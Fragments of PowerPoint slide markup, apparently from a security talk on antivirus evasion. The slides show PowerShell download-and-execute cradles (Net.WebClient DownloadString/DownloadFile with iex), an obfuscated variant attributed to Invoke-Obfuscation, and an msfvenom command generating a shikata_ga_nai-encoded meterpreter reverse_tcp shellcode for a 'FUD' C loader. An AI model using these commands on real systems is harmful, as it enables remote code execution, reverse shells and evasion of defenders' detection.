      </mc:AlternateContent>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Explosion 1 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BEBC3FE-C50E-664C-B11F-F9E75B977E0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="229852" y="3569171"/>
            <a:ext cx="5067942" cy="3228278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9DD4D7-9F31-F54D-8D7E-7160B916ACD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1561171" y="4735920"/>
            <a:ext cx="2246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4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Detected!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3C49160-6CF4-4A44-8F09-4D3203B42428}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4529463" y="2916404"/>
            <a:ext cx="3908827" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:pattFill prst="pct5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</p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="032F62"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="SFMono-Regular"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="032F62"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="SFMono-Regular"/>
              </a:rPr>
              <a:t>DownloadString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="032F62"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="SFMono-Regular"/>
              </a:rPr>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="032F62"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="SFMono-Regular"/>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="032F62"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="SFMono-Regular"/>
              </a:rPr>
              <a:t>              )</a:t>
            </a:r>
            <a:endParaRPr lang="en-NL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081432-FB0F-D649-84A3-7A20339123E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="410237" y="1508220"/>
            <a:ext cx="830164" cy="769441"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:pattFill prst="pct5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</p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="4400" b="0" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="SFMono-Regular"/>
              </a:rPr>
              <a:t>iex</a:t>
            </a:r>
            <a:endParaRPr lang="en-NL" sz="440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88DD481-05D4-FA44-B6B4-2E1A2618E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9272" y="5886810"/>
            <a:ext cx="1603747" cy="85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608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29B2F-5A87-7943-A043-6C5DDE938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546" y="376276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Evading using PowerShell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ED53B22-F88B-004A-A0E8-FDED61002AEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="410237" y="2373895"/>
            <a:ext cx="8399655" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:pattFill prst="pct5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en-GB" sz="2800" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005CC5"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>New-Object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0" err="1"/>
              <a:t>Net.WebClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0" err="1"/>
              <a:t>DownloadFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D73A49"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>$out</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-NL" sz="28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0414189-E915-8740-A6A2-8CBA094FEF7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4610065" y="3446203"/>
            <a:ext cx="687729" cy="1114646"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="1270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3D Model 6" descr="Eyes – Surprise">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F658242-AC35-6F4F-A098-B5AA257D76B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71347369"/>
                  </p:ext>
                </p:extLst>
              </p:nvPr>
            </p:nvGraphicFramePr>
            <p:xfrm>
              <a:off x="7125271" y="3835346"/>
              <a:ext cx="4047001" cy="230245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4047001" cy="2302457"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </am3d:spPr>
                  <am3d:camera>
                    <am3d:pos x="0" y="0" z="5458994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638394" d="1000000"/>
                    <am3d:preTrans dx="-82030" dy="-110215693" dz="-25245148"/>
                    <am3d:scale>
                      <am3d:sx n="1000000" d="1000000"/>
                      <am3d:sy n="1000000" d="1000000"/>
                      <am3d:sz n="1000000" d="1000000"/>
                    </am3d:scale>
                    <am3d:rot ax="-525878" ay="-197735" az="3049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01117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3D Model 6" descr="Eyes – Surprise">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F658242-AC35-6F4F-A098-B5AA257D76B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25271" y="3835346"/>
                <a:ext cx="4047001" cy="2302457"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Explosion 1 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BEBC3FE-C50E-664C-B11F-F9E75B977E0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="229852" y="3569171"/>
            <a:ext cx="5067942" cy="3228278"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal1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081432-FB0F-D649-84A3-7A20339123E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="410237" y="1508220"/>
            <a:ext cx="830164" cy="769441"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:pattFill prst="pct5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</p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="4400" b="0" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="SFMono-Regular"/>
              </a:rPr>
              <a:t>iex</a:t>
            </a:r>
            <a:endParaRPr lang="en-NL" sz="4400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6146" name="Picture 2" descr="Clean Icon Png #365033 - Free Icons Library">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EAE4C29-7E2F-E448-ABCE-C5E11055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979" y="4326673"/>
            <a:ext cx="1163688" cy="131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8B4DCD3-2BEB-6D4E-A88D-C79C3C969063}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="206300" y="2960665"/>
            <a:ext cx="10965972" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:pattFill prst="pct5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D73A49"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D73A49"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>G</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D73A49"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D73A49"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>M </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D73A49"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D73A49"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D73A49"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="032F62"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>'(&amp; (`G`C`M *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="032F62"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>ew</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="032F62"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>-O*) `N`E`T`.`W`E`B`C`L`I`E`N`T)."`D`O`W`N`L`O`A`D`F`I`L`E"($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="032F62"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="032F62"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>, $out)'</a:t>
            </a:r>
            <a:endParaRPr lang="en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D2F1A-2E75-5E42-A2D0-722BD15EB2E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5297794" y="3411797"/>
            <a:ext cx="550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5"/>
              </a:rPr>
              <a:t>https://github.com/danielbohannon/Invoke-Obfuscation</a:t>
            </a:r>
            <a:endParaRPr lang="en-NL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E9814E46-24A4-2948-AB1B-7B2A2C7D3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550" y="5856499"/>
            <a:ext cx="1758721" cy="94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997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0D88A8C-43DC-4450-8BFC-D0716F70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" y="0"/>
            <a:ext cx="12185372" cy="685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868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C131D-AA56-514D-B918-53A98A800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166" y="2553987"/>
            <a:ext cx="8040029" cy="1750026"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-NL" sz="7200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PowerShell Demo…..</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2696155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sdemo.mp4" descr="psdemo.mp4">
            <a:hlinkClick r:id="" action="ppaction://media"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9746E003-E038-2E47-8D64-1AA0268A62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62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87FC1-4ECF-BB4B-B2AF-7EE75C4C7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62" y="17902"/>
            <a:ext cx="10841910" cy="1325563"/>
          </a:xfrm>
        </p:spPr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Demo of FUD meterpreter payload using C/C++</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Double Brace 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86A5B7C1-89F8-E44B-93A1-5FDC1B35CF61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="917331" y="1325564"/>
            <a:ext cx="2344615" cy="949286"/>
          </a:xfrm>
          <a:prstGeom prst="bracePair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F5E13B-2C33-DC4A-A9C1-2AE2D3162870}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1064709" y="1492430"/>
            <a:ext cx="204985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dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:endParaRPr lang="en-NL" sz="3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0EAF78-72B9-AF4C-BE21-890D80DB71E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="524107" y="2441716"/>
            <a:ext cx="3450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windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:endParaRPr lang="en-NL" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF00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C2AAF77-C26B-C74F-9115-5CD8DCD4ECE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3490332" y="1800206"/>
            <a:ext cx="2330605" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/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uble Brace 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37F69B33-DC54-F245-92DE-CDF978885476}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6049323" y="1325564"/>
            <a:ext cx="2344615" cy="949286"/>
          </a:xfrm>
          <a:prstGeom prst="bracePair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CDC6F2C-7BD4-3F49-AF76-5513EF98204D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6404130" y="1490597"/>
            <a:ext cx="163499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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Encoder</a:t>
            </a:r>
            <a:endParaRPr lang="en-NL" sz="3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5117E-9E67-4C47-99F8-F25F6089A484}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6224417" y="2441716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x86/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shikata_ga_nai</a:t>
            </a:r>
            <a:endParaRPr lang="en-NL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1727A88-25DF-E94A-ADC0-28C1CF7B593E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8538117" y="1888725"/>
            <a:ext cx="1977483" cy="1947295"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/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Double Brace 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DB32773-6B4F-8746-BC41-B7099BA6B341}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9003037" y="3836020"/>
            <a:ext cx="2344615" cy="949286"/>
          </a:xfrm>
          <a:prstGeom prst="bracePair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19A936-319C-B443-A2D5-B7338C8BFA4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9206969" y="4091405"/>
            <a:ext cx="19367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400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ShellCode</a:t>
            </a:r>
            <a:endParaRPr lang="en-NL" sz="3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4F3C622-45AA-3643-A890-FB4D7CA06FA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="524107" y="6346477"/>
            <a:ext cx="11156003" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:pattFill prst="pct90">
            <a:fgClr>
              <a:schemeClr val="tx1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msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -p windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> LHOST=XX.XX LPORT=XXXX -e x86/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shikata_ga_nai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 8 -f c &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>payload.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-NL" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1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467CC8-31C8-AE45-AEA6-D484044E8E41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="8039129" y="4785306"/>
            <a:ext cx="1941212" cy="1470529"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/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B11D924-4742-084A-BBE2-85D8EADED8B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7220843" y="3971161"/>
            <a:ext cx="1631590" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/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ouble Brace 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2E3304A-A177-9C49-9476-9534CAB37F25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4750008" y="3496518"/>
            <a:ext cx="2344615" cy="949286"/>
          </a:xfrm>
          <a:prstGeom prst="bracePair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unsigned char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[] </a:t>
            </a:r>
            <a:endParaRPr lang="en-NL" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill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138BC1D-656F-9440-AAB8-39D02BF72C7F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3261946" y="3971161"/>
            <a:ext cx="1393688" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/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Double Brace 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{833D2FD9-FD50-7D4D-9F14-1C38121C487D}"/>
